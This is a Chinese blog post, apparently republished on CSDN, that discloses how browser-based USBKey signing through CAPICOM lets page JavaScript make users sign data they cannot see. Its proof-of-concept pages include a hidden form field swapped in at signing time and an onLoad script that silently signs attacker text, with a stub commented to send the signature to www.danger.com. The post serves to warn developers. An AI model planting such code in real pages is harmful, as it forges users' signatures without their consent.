【收录】国内大部分的USBKey通过B/S方式(CAPICOM)产生数字签名的严重安全漏洞 ...

最新推荐文章于 2024-04-30 22:45:18 发布
最新推荐文章于 2024-04-30 22:45:18 发布
阅读量240 收藏 1
点赞数
文章标签: 浏览器 IE Eclipse JavaScript .net ViewUI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_7924/article/details/82062720
版权

很多人喜欢使用UsbKey产生数字签名的方式提交到服务器,最近我做的几个省厅的项目均如此,利用USBKey提供的ActiveX插件(更常见的是CAPICOM接口)通过USBKey厂商提供的WindowsCSP去调用UsbKey产生数字签名。

1,  用户在页面浏览文书

      2,  用户对页面中的 Form 数据进行签名

      3,  在本地产生数字签名

      4,  数字签名提交到服务器


   大家都认为以上的方案非常可靠,但这种方案存在一个极为严重的安全问题——诱导签名。
   UsbKey的用户在大多数情况下无法确认自己看到的数据就是自己说签名的数据!因为,签名数据源是通过 JavaScript 去控制的,而不是用户。

我举一个简单的例子,如下面的页面 用户看到并以为自己产生签名的源数据是“逮捕张子强及其同伙” , 但其实不是!

<script src="Sign.js"></script>

<OBJECT id="oCAPICOM"

codeBase="capicom.cab#version=2,0,0,3" classid="clsid:A996E48C-D3DC-4244-89F7-AFA33EC60679"></OBJECT>

 

<br>

<form id="writeSig" method="post" name="writeSig" action="/SignServlet" target="_top">

看上去进行签名的数据: <input name="data"  value=" 逮捕张子强及其同伙 " >

 

<br>

<!-- 实际上进行签名的数据: " 释放张子强及其同伙 " -->

<input type="hidden" name="data_danger" value=" 释放张子强及其同伙 " >

<br>

 

数字签名结果: <textarea cols="100" rows="20" id="theSignedData"></textarea>

<br>

<INPUT TYPE="button" name=t1

value=" 签名数据 " οnclick="theSignedData.value=pkiSignData(data_danger.value)">

</form>

上面的恶意例子能够运行于所有的 USBKey 的页面,用户签名的数据其实是“释放张子强及其同伙”。但由于数据被隐藏于页面之后,用户根本看不到,以至于产生恶意诱导签名的严重后果。

防止这种恶意诱导签名的办法通常是在服务器要确保所有的涉及数字签名的页面在传递到客户端 IE 浏览器前,都不会被篡改,但这种方法不能保证 100% 安全,因为在用户那一端,仍然存在一种非常高风险的诱导签名的可能,甚至是未经用户许可,直接调用用户 USBKey 去产生恶意数字签名,看下面的例子:

用户在浏览页面的时候,已经在页面背后无声无色地产生了数字签名,而且用户根本无法知道自己已经对“ 我今天去好又多偷了几包烟 ”这样的内容进行了签名!

下面的例子是真实的例子,能够运行于任何的 IE 浏览器,最后的结果是,页面通过用户的 UsbKey 产生了恶意签名并送到 www.danger.com

<script src="Sign.js"></script>

<OBJECT id="oCAPICOM"

codeBase="capicom.cab#version=2,0,0,3" classid="clsid:A996E48C-D3DC-4244-89F7-AFA33EC60679"></OBJECT>

<body onLoad="signWithAllowed()">

<br>

<form  id="writeSig" method="post" name="writeSig" action="/SignServlet" target="_top">

你在浏览文书: <input name="data"  value=" 逮捕张子强及其同伙 ">

你以为这是仅仅是一个用于浏览的页面!!

 

</body>

 

<script>

function signWithAllowed()

{

         //alert(' 恶意签名执行 , 以下的签名将不知不觉地被产生,并保存到某个地方 ');

         var signvalue=pkiSignData(' 我今天去好又多偷了几包烟 s');

         //alert(sign_value);

         sendSignValueToDangerPalce();

}

 

function sendSignValueToDangerPalce()

{

         //Send Signvalue to www.danger.com

}

</script>

       在目前大多数Usbkey中均存在诱导签名的问题,在第一次产生数字签名的时候,USBKey会提示用户输入PIN,但在第2次,第3次签名动作产生的时候,这些都已经是用户无法感知的事实!
      这就是我为什么不希望使用B/S,而是C/S方式手段产生数字签名的原因。
       我的另外一篇文章提到如何通过Java调用CryptoAPI: 
      http://www.blogjava.net/security/archive/2006/07/11/java_cryptoapi_csp_signature.html, 已经被用于SecureX Eclipse Plugin(securex.sourceforge.net)当中。
      
      在我负责的多个业务系统中的数字签名/印章中,均存在上面的危险!除非我们能够确保恶意页面不存在,否则,某个程序员在系统中,哪怕是Insert很小一段JS代码到某个不显眼的页面,后果是非常严重的。

iteye_7924
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CAPICOM.CAB
08-17
CAPICOM.CAB IE浏览器读取数字证书, CAPICOM.CAB IE浏览器读取数字证书
[原创]国内大部分USBKey通过B/S方式CAPICOM产生数字签名严重安全漏洞
David.turing's Security Blog
11-13 525
很多人喜欢使用UsbKey产生数字签名方式提交到服务器,最近我做的几个省厅的项目均如此,利用USBKey提供的ActiveX插件(更常见的是CAPICOM接口)通过USBKey厂商提供的WindowsCSP去调用UsbKey产生数字签名。1,  用户在页面浏览文书       2,  用户对页面中的...
JAVA:JNA方式调用USBKey SKF接口实现SM2证书的PKCS1格式签名和验证 实验总结_20220111_七侠镇莫尛貝
七侠镇莫小贝的同福客栈
12-03 3989
JAVA:JNA方式调用USBKey SKF接口实现SM2证书的PKCS1格式签名和验证 实验总结
java usbkey ssl_Java读取硬件USBKey(简称UKEY)中的SSL证书信息,创建双向SSL认证上下文环境...
weixin_36483301的博客
02-13 1359
最近项目中遇到了这样的需求,故记录下来,希望可以帮到需要的人O(∩_∩)O~以下以 Linux 环境为基础:读取硬件 UKEY 的SSL证书信息,需要硬件厂商提供:UKEY型号名称、驱动文件(类似pkcs11.so)。直接上代码段示例://厂商提供的UKEY型号名称staticfinalStringUKEY_PROVIDER="xxx";//UKEY驱动lib库文件staticfi...
安装QC和遇到的问题解决
dianxu0556的博客
02-22 375
最近在安装QC时出现了些问题,这里结合在网络上搜索到的经验再进行总结。 一、安装环境 1、安装环境:windowsserver 2003、SQL Server2005 2、准备安装文件:Quality Center 9.0 二、安装前部分设置 1、首先在安装之前保证系统已经安装了SQL Server2005; 2、启动服务:点击【我的电脑】右键——管理——服务和应用程...
最全证书签名工具(makecert.exe, signtool.exe, capicom.dll)
11-20
最全证书签名工具(makecert.exe, signtool.exe, capicom.dll) 内含证书生成工具和创建证书的命令 查询本地计算机的所有证书的命令 证书技术开发值得收藏
证书签名工具(makecert.exe, signtool.exe, capicom.dll)
05-21
证书签名工具(makecert.exe, cert2spc.exe, signtool.exe, capicom.dll)
capicom.dll 2.1.0.2
10-09
微软最新数字证书控件 capicom.dll 版本 2.1.0.2 提取自capicom_dc_sdk2.1.0.2
capicom.dll
11-21
安装qc11是windows server2008 需要的dll
VBS中通过调用CAPICOM对象实现SHA1&MD5加密
09-05
MD5算法的VBS代码在网上可以找到很多,这些代码都是按照“算法”写出来的,所以都很长,更重要的是,找不到SHA1算法的VBS实现。
capicom包和demo代码(全)
09-10
包括capicomcab包,dll库和在各种环境下的调用demo。
Capicom调用代码封装到ActiveX——解决javascriptCapicom读取数字证书信息时,IE弹出安全提示的问题...
weixin_33920401的博客
06-27 136
此文系转载 原文:http://www.cnblogs.com/xuezhizhang/archive/2011/07/10/2102542.html 一、使用javascript方法: <object id="oCAPICOM" codebase="http://download.microsoft.com/download/E/1/8/E18ED994-8005-...
27.3.2 CAPICOM对象——Certificate对象
PKI
04-28 2501
Certificate对象就是单个数字证书对象。它包括如下主要的属性。表 Certificate对象的属性 值 数据类型 权限
前端 usbkey navigator.usb 登录检测
Leon4055的博客
12-11 488
是一个与USB设备交互的API,它允许网页和浏览器扩展程序访问连接到电脑的USB设备。这个API可以让网页直接与USB设备进行数据交换,而无需用户手动安装任何软件。API目前主要支持Chrome OS和Windows操作系统。以下是发现设备:浏览器可以列出所有连接的USB设备,并获取它们的描述信息。请求访问设备:用户可以选择允许网页访问特定的USB设备。传输数据:一旦获得访问权限,网页可以向USB设备发送数据或从设备接收数据。控制设备。
.NET操作 Access (MSAccess)
最新发布
jhl52771的专栏
04-30 450
注意:新项目推荐 Sqlite ,Access需要注意的东西太多了,比如OFFICE版本,是X86还是X64。
capicom 2.1
06-06
Capicom 2.1试图提供一种简单的方法来执行加密和数字签名的功能,但是随着时间的推移,它已经被证明是不够安全的。相比之下,CNG和BCrypt已经成为更好的替代品,可以提供更安全的加密和认证方式。总之,Capicom2.1是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值